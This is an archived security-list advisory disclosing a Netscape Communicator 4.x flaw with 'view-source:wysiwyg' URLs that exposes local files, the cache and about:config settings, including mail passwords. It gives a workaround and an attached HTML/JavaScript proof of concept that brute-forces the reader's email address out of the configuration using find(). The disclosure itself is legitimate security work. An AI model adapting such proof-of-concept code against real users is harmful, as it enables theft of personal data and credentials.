This is a multi-part message in MIME format. --------------6718BA18997C30F69282E3B5 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document. Vulnerabilites: Browsing local directories Reading user's cache Reading parsed HTML files Reading Netscape's configuration ("about:config") including user's email address, mail servers and password. Probably others This vulnerability may be exploited by using HTML email message. Workaround: Disable JavaScript Netscape is notified about the problem. Demonstration is available at: http://www.nat.bg/~joro/viewsource.html Regards, Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski --------------6718BA18997C30F69282E3B5 Content-Type: text/html; charset=koi8-r; name="viewsource.html" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="viewsource.html" <HTML> <BODY> There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document. <BR> Vulnerabilites: <HR> Browsing local directories<BR> Reading user's cache<BR> Reading parsed HTML files<BR> Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR> Probably others<BR> <BR> This vulnerability may be exploited by using HTML email message. <HR> Workaround: Disable JavaScript <HR> This demonstration tries to find your email address, it may take some time. <BR><BR> <A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A> <HR> <SCRIPT> s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>" +"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>" +" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\" " +"for(i=0;i<charstoread;i++) {" +" t=res;" +" find(mend);" +" for(c=1;c<256;c++) {" +" t=res + String.fromCharCode(c);" +" if (find(t,true,true)) {" +" res=t;" +" if (c==32) i=charstoread+1" +" } " +" }" +"}" +"res=res.substring(mag.length);" +"alert(msg1 + res);" +" ;\",3000);</"+"SCRIPT>'"; //a=window.open(s); location=s; </SCRIPT> </BODY> </HTML> --------------6718BA18997C30F69282E3B5--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:48:01 PDT